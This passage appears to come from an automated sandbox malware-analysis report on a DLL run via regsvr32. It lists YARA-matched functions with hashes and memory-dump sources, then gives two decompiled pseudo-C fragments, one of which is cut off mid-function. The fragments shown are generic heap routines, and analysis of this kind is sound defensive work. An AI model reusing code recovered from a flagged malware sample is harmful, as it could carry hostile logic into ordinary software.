                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: t"
                                                                                                          • API String ID: 0-2131657386
                                                                                                          • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                          • Instruction ID: eec496f400d99df5f2ba82127e2984c6261299044b47695823f501dee97586a9
                                                                                                          • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                          • Instruction Fuzzy Hash: A641C67190070D8BDF48DF64C48A4DE7FB0FB483A8F65621DE81AB6290D3B89585CF99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: gLv
                                                                                                          • API String ID: 0-1669999040
                                                                                                          • Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                          • Instruction ID: 936db57c453a3c1d875388550a4d48e0a27aa2073a145de5ffef6083b77fa013
                                                                                                          • Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                          • Instruction Fuzzy Hash: B041A2B190078E8FDF84CF64C88A4DE7BB0FB18358F104619F866A6290D3B89665CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 2|
                                                                                                          • API String ID: 0-4112153497
                                                                                                          • Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                          • Instruction ID: 0899758fd8ed36926db8b356fa88028a30de60edd862f78633f2fdac5a335de3
                                                                                                          • Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                          • Instruction Fuzzy Hash: AC31C2715183808FD7A8DF28C58A55BBBF1FBD6704F50891DE6CA8A260DB76D849CB03
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: v)v
                                                                                                          • API String ID: 0-2248367734
                                                                                                          • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                          • Instruction ID: f3cd9a8fb7bff1942fa26150dab3d954f4edccb2766146ea7f8bed20829303d7
                                                                                                          • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                          • Instruction Fuzzy Hash: A731FEB0D106189BDF88DFB8D98A4DDBBF0BB48308F50822DD816B6290D7785A45CF68
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: b
                                                                                                          • API String ID: 0-1908338681
                                                                                                          • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                          • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                                          • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                          • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Y
                                                                                                          • API String ID: 0-579211002
                                                                                                          • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                          • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                                          • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                          • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0}
                                                                                                          • API String ID: 0-2955618701
                                                                                                          • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                          • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                                          • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                          • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6N
                                                                                                          • API String ID: 0-1503784733
                                                                                                          • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                          • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
                                                                                                          • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                          • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: S}
                                                                                                          • API String ID: 0-4277866985
                                                                                                          • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                          • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                                          • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                          • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: H-
                                                                                                          • API String ID: 0-1037293833
                                                                                                          • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                          • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                                          • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                          • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: u*AR
                                                                                                          • API String ID: 0-611844632
                                                                                                          • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                          • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                                          • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                          • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: g*`
                                                                                                          • API String ID: 0-1142845859
                                                                                                          • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                          • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                                          • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                          • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 5$
                                                                                                          • API String ID: 0-3756733592
                                                                                                          • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                          • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                                          • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                          • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: n*=
                                                                                                          • API String ID: 0-1578461029
                                                                                                          • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                          • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                                          • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                          • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0000000118000A878(long long __rax) {
                                                                                                          				signed int _t3;
                                                                                                          
                                                                                                          				_t3 = GetProcessHeap();
                                                                                                          				 *0x800227e8 = __rax;
                                                                                                          				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                                          			}




                                                                                                          0x18000a87c
                                                                                                          0x18000a885
                                                                                                          0x18000a893

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 54951025-0
                                                                                                          • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                          • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                                          • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                          • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                          • Instruction ID: aaa9d3b60d171c80e4c28b19ef79cf4d44c5ef4986820338023fa3e15c28f6ef
                                                                                                          • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                          • Instruction Fuzzy Hash: B3E1E670E0460ACFDF58DFA8D45A9AFBBB2FB44348F004159D816A72A0D774AA15CBC9
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                          • Instruction ID: 72b7e6ad9a5c19067b5f0e6b30208c5e88ff7398e4a17ad8b625faf19fe6bbd6
                                                                                                          • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                          • Instruction Fuzzy Hash: 53C1CEB9903609CFDF68CF38C49A59D3BF1EF64308F204119EC269A2A6D774D529CB48
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                          • Instruction ID: b25cc792ccb0387f0a1661a1e3dd33e2a03242a8af2adb4a257bca6374d28327
                                                                                                          • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                          • Instruction Fuzzy Hash: C8B12770E04B089FDFA8DFA8D48A9DEBBF2FB44344F00451DE846A7290D7B8551ADB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                          • Instruction ID: 3a5138268ed8729b058f82d1cda45290b3a5691a0bd839e92b6ffe0f756d5fae
                                                                                                          • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                          • Instruction Fuzzy Hash: EFB1F7706087C88FDBBEDF24C8892DB7BA9FB46708F504219E9CA8E254DB745744CB42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                          • Instruction ID: 96b0bf56c4d159cf98ae6f6349460d7673076b40b61231c649e355f7b541a341
                                                                                                          • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                          • Instruction Fuzzy Hash: 0D813B70D08709EFCB58DFA8C49599EBBF1FB54344F00856EE849EB290DB749A09CB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                          • Instruction ID: 3d93191bfcb4bb4cbdd69d5a1aa2929265c4e0835fb74081d05ccfbc8f1e1dcb
                                                                                                          • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                          • Instruction Fuzzy Hash: DC8106715107499BCF88CF28C8C99DD7BB0FB483A8FA56218FC0AA6254D774D885CB84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                          • Instruction ID: 6c35d92a3c5ddef46085a13e08a1c5c14b34e4b74df76e39bb5e1586daa3afef
                                                                                                          • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                          • Instruction Fuzzy Hash: 4161217061464C8BDF28EF78D4962AD3BE1FB44308F20613DEC669B2A2D774DA06CB44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                          • Instruction ID: 2b0361099bf627780036b19336a5c6fd019e5bea97002f82f5881d6b9e03cf2e
                                                                                                          • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                          • Instruction Fuzzy Hash: BA71F770508789CBDBF9CF24D8896DE7BE4FB88704F20461DE9998B2A0DB749685CF41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                          • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                          • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                          • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                          • Instruction ID: 895f2fa515e04e0de02a5f964ecea705a2badc6f56fe6807ecfedc95ea4a5b96
                                                                                                          • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                          • Instruction Fuzzy Hash: 78510670508788CBDBBADF34C8892D97BB0FB58304F90861DD84E8E290DB78574ADB45
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 56%
                                                                                                          			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                          				void* _t24;
                                                                                                          				int _t26;
                                                                                                          				signed int _t51;
                                                                                                          				void* _t52;
                                                                                                          				signed long long _t66;
                                                                                                          				signed long long _t74;
                                                                                                          				signed long long _t76;
                                                                                                          				signed long long _t77;
                                                                                                          				signed int* _t90;
                                                                                                          				signed long long _t95;
                                                                                                          				signed long long _t96;
                                                                                                          				signed long long _t98;
                                                                                                          				signed long long _t104;
                                                                                                          				long long _t115;
                                                                                                          				void* _t117;
                                                                                                          				void* _t120;
                                                                                                          				signed long long* _t123;
                                                                                                          				signed long long _t124;
                                                                                                          				signed long long _t126;
                                                                                                          				signed long long _t129;
                                                                                                          				signed long long*** _t132;
                                                                                                          
                                                                                                          				_t52 = __edi;
                                                                                                          				_t51 = __edx;
                                                                                                          				 *((long long*)(_t117 + 8)) = __rbx;
                                                                                                          				 *((long long*)(_t117 + 0x10)) = _t115;
                                                                                                          				 *((long long*)(_t117 + 0x18)) = __rsi;
                                                                                                          				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                          				_t132 = __rcx;
                                                                                                          				_t90 =  *_t66;
                                                                                                          				if (_t90 == 0) goto 0x800069ac;
                                                                                                          				_t124 =  *0x80021010; // 0x268a0197523d
                                                                                                          				_t111 = _t124 ^  *_t90;
                                                                                                          				asm("dec eax");
                                                                                                          				_t74 = _t124 ^ _t90[4];
                                                                                                          				asm("dec ecx");
                                                                                                          				asm("dec eax");
                                                                                                          				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
                                                                                                          				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
                                                                                                          				_t101 =  >  ? _t66 : _t76;
                                                                                                          				_t6 = _t115 + 0x20; // 0x20
                                                                                                          				_t102 = ( >  ? _t66 : _t76) + _t76;
                                                                                                          				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
                                                                                                          				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
                                                                                                          				_t7 = _t115 + 8; // 0x8
                                                                                                          				r8d = _t7;
                                                                                                          				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
                                                                                                          				_t24 = E0000000118000878C(_t66, _t111);
                                                                                                          				if (_t66 != 0) goto 0x800068e2;
                                                                                                          				_t104 = _t76 + 4;
                                                                                                          				r8d = 8;
                                                                                                          				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
                                                                                                          				_t129 = _t66;
                                                                                                          				_t26 = E0000000118000878C(_t66, _t111);
                                                                                                          				if (_t129 == 0) goto 0x800069ac;
                                                                                                          				_t123 = _t129 + _t76 * 8;
                                                                                                          				_t77 = _t129 + _t104 * 8;
                                                                                                          				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                          				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
